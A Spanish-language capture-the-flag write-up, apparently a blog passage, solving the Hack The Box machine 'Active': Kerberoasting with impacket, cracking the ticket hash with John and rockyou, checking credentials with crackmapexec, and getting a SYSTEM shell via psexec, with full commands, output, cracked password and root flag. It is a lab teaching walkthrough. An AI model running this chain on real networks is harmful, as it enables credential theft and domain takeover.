(Si no tenemos "ntpdate" instalado, instalarlo con el gestor de paquetes aptitude, "sudo apt install ntpdate")

sudo ntpdate 10.10.10.100

Ejecutamos:

❯ sudo ntpdate 10.10.10.100
2025-02-23 23:30:31.528622 (-0300) +2.089291 +/- 0.100257 10.10.10.100 s1 no-leap
CLOCK: time stepped by 2.089291

Ahora vamos a ver si tenemos permisos para obtener el ticket en forma de hash con la herramienta "impacket-GetUserSPNs" con el siguiente comando:

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18

El comando se estructuraria de la siguiente manera:

impacket-GetUserSPNs {Dominio o IP}/{Nombre del usuario}:{Password del usuario}

Ejecutamos:

❯ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 16:06:40.351723  2025-02-22 08:35:36.933359

Vemos que si podemos y además obtendremos la contraseña del administrador en forma de hash, entonces ahora vamos a pedirlo con el parametro "-request":

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request

❯ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 16:06:40.351723  2025-02-22 08:35:36.933359             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$68fc33ed307322ba1e71555d9541e8fe$aa2ea019b718a625f8e1dfd06c80772f43148fff909eddc2e5514558d0a27afd2acf90b71a365bcc741c07a4c830770f89a978cda12be069bbb2e7b0a542f0955e418dc7845dd501f95f652d33febeaaf574e4bb9e3195cd9fe4919786348f9f49190fc9386de30ed66a7d238ba42a0148c00cfff5eee7292e4f1278ac621fa6f0311faba87eb9b797744f099b36fe35e72ff74b1a110771a1c57f4e24c0d280fae1899d1dff8e9e0d0d5c158755a188d5d2dde87d8563f77b2af7015f6baae40ef60f46b9af14f1ee8e2b8817c84b82820b9f71d9e569d8726069ff9630674f205b2dd3514984118b45e5fc1de2a5be5fb18eca46f46ac3fbbaa4621420b5d96ed958e4b2387ecffcdd0cc80511a11735d9c260b829eb95e8e06e37ef43a3af27b8fadb3804136f2e6d17b1652518a3d39464e69faf5d4b8eec531c837098be53676345a91e05b68f9918212d9b14b558dad4b753ddc15470939815d2b615b5869236681b63383d32fab279b74c4c92432e7b588f0fc3a385899137759f1f039260c2016d13558cd12d6ea5b42c85cc5320207cda7de6e54f5216bedc850268cc88afef2e911aab405b3ea9016581f5947534fbd79b26d2f5c7bc30a1dc44877c4ab3eafc770498f54f1466165024afa3e73f38e0de2c2ae5a180798c2c5c3a0afba8dfe57e52b73cc023f38e2533dd5aa5263a3f8776d6c99ac073d0d27336768145f63343ef999bde08a6d9d0a3c58a0d755b1c717fee3a637b49277f0fd23b5deba5ea64faab8213df178de2e73e63d4a117e1ef27907ec37432f73bfdc94012560c26aee216d0f48a48e63410ae292defdc43e63e55b157ad5aacc250faa9c38934db4937ba5c52adfd8eb2447faaf7157a79ee68701818078d19a2a2c28597c8df97ebf7f23797d07c3b056a6837d0cbcb4d844f7b894f1b2249c6d76082c82033107568d52dde1b7c7e6b4b1859a89ce5443d5c6bff07f1ade13a519579e8bd873441bcaa5161107a53792e0a9e4197c5480970cec70fd76202d7401b825ea5848bf7583ca306457d173f1f041cfe85977f8520a45d7e6136d0492b779b334e3d452ab363d3f7ce3bd61d4ebc6d6ecf9865ecd5f7ec28dc8a4e4a190a8f62ba036102c63f711bcaa81f2e9f77cee17b6fb1bef8386279037d79266360cdc339c1e0aa7d2d0ab53304ed7385b84d2534e9d3a9e565d26ccc066be68756a236819a22a645c05a5b1be5ce0097431d5270b656cfa6c28adc

Vemos que nos devolvio la contraseña del Administrador pero en forma de hash, vamos a guardarnoslo en un archivo:

❯ vim password_hash_ticket
❯ cat password_hash_ticket
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: password_hash_ticket
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$68fc33ed307322ba1e71555d9541e8fe$aa2ea019b718a625f8e1dfd06c80772f43148fff909eddc2e5514558d0a27afd2acf90b71a36
       │ 5bcc741c07a4c830770f89a978cda12be069bbb2e7b0a542f0955e418dc7845dd501f95f652d33febeaaf574e4bb9e3195cd9fe4919786348f9f49190fc9386de30ed66a7d238ba42a0148c00cfff5eee7292e4f1278a
       │ c621fa6f0311faba87eb9b797744f099b36fe35e72ff74b1a110771a1c57f4e24c0d280fae1899d1dff8e9e0d0d5c158755a188d5d2dde87d8563f77b2af7015f6baae40ef60f46b9af14f1ee8e2b8817c84b82820b9f
       │ 71d9e569d8726069ff9630674f205b2dd3514984118b45e5fc1de2a5be5fb18eca46f46ac3fbbaa4621420b5d96ed958e4b2387ecffcdd0cc80511a11735d9c260b829eb95e8e06e37ef43a3af27b8fadb3804136f2e6
       │ d17b1652518a3d39464e69faf5d4b8eec531c837098be53676345a91e05b68f9918212d9b14b558dad4b753ddc15470939815d2b615b5869236681b63383d32fab279b74c4c92432e7b588f0fc3a385899137759f1f03
       │ 9260c2016d13558cd12d6ea5b42c85cc5320207cda7de6e54f5216bedc850268cc88afef2e911aab405b3ea9016581f5947534fbd79b26d2f5c7bc30a1dc44877c4ab3eafc770498f54f1466165024afa3e73f38e0de2
       │ c2ae5a180798c2c5c3a0afba8dfe57e52b73cc023f38e2533dd5aa5263a3f8776d6c99ac073d0d27336768145f63343ef999bde08a6d9d0a3c58a0d755b1c717fee3a637b49277f0fd23b5deba5ea64faab8213df178d
       │ e2e73e63d4a117e1ef27907ec37432f73bfdc94012560c26aee216d0f48a48e63410ae292defdc43e63e55b157ad5aacc250faa9c38934db4937ba5c52adfd8eb2447faaf7157a79ee68701818078d19a2a2c28597c8d
       │ f97ebf7f23797d07c3b056a6837d0cbcb4d844f7b894f1b2249c6d76082c82033107568d52dde1b7c7e6b4b1859a89ce5443d5c6bff07f1ade13a519579e8bd873441bcaa5161107a53792e0a9e4197c5480970cec70f
       │ d76202d7401b825ea5848bf7583ca306457d173f1f041cfe85977f8520a45d7e6136d0492b779b334e3d452ab363d3f7ce3bd61d4ebc6d6ecf9865ecd5f7ec28dc8a4e4a190a8f62ba036102c63f711bcaa81f2e9f77c
       │ ee17b6fb1bef8386279037d79266360cdc339c1e0aa7d2d0ab53304ed7385b84d2534e9d3a9e565d26ccc066be68756a236819a22a645c05a5b1be5ce0097431d5270b656cfa6c28adc
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Antes de realizar fuerza bruta, vamos a utilizar un diccionario en especial, clasico de clasicos, vamos a utilizar rockyou, para eso vamos a bajarnoslo desde el siguiente enlace:

Enlace rockyou.txt

Y ahora vamos a aplicar fuerza bruta con John The Ripper sobre este ticket hasheado con el siguiente comando:

john --wordlist=rockyou.txt {HASH TICKET}

En mi caso seria de la siguiente manera el comando:

john --wordlist=rockyou.txt password_hash_ticket

Ejecutamos:

❯ john --wordlist=wordlist/rockyou.txt password_hash_ticket
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 4.79% (ETA: 23:49:29) 0g/s 789504p/s 789504c/s 789504C/s skyline93..skator
Ticketmaster1968 (?)     
1g 0:00:00:13 DONE (2025-02-23 23:49) 0.07429g/s 782873p/s 782873c/s 782873C/s Tiffani143..TiagoTorrao
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Vemos que nos arrojo una contraseña, de tal manera que la contraseña del usuario Administrator es "Ticketmaster1968"

User: Administrator
Password: Ticketmaster1968

Vamos a verificar que las credenciales sean validas con crackmapexec:

crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'

❯ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)

Ahora vamos a listar los permisos que tendremos dentro de los recursos compartidos:

crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' --shares

❯ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' --shares
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
SMB         10.10.10.100    445    DC               [+] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$          READ,WRITE      Remote Admin
SMB         10.10.10.100    445    DC               C$              READ,WRITE      Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ,WRITE      Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.100    445    DC               Users           READ

`3.2 Reverse shell con las credenciales Administrator`

Una vez las credenciales obtenidas del usuario administrator, vamos a conseguir una reverse shell con permisos NT AUTHORITY\SYSTEM, para eso, vamos a utilizar la herramienta "impacket-psexec" pasandole como parametro las credenciales y ciertos parametros

El comando a utilizar es el siguiente:

impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd.exe

Ejecutamos:

❯ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd.exe
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file bvkxOfwz.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service VzVS on 10.10.10.100.....
[*] Starting service VzVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

`3.3 Obtención de la flag root`

La flag de root se encuentra dentro de la ruta "C:\Users\Administrator\Desktop\root.txt", vamos a visualizarla con el comando "type"

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type "C:\Users\Administrator\Desktop\root.txt"
bf19773bbc7b09bb12880d27b0aafaa3

C:\Windows\system32>

Con esto, concluimos la maquina "Active" de Hack The Box

Espero te haya sido de ayuda este Write Up :)

Si tuviste alguna dificultad a la hora de resolverlo, no olvides contactarme en mis redes sociales

https://www.hackthebox.com/achievement/machine/2243466/148www.hackthebox.com

AnteriorDevel [EASY🟢]SiguientePhotobomb [EASY🟢]

Última actualización hace 9 meses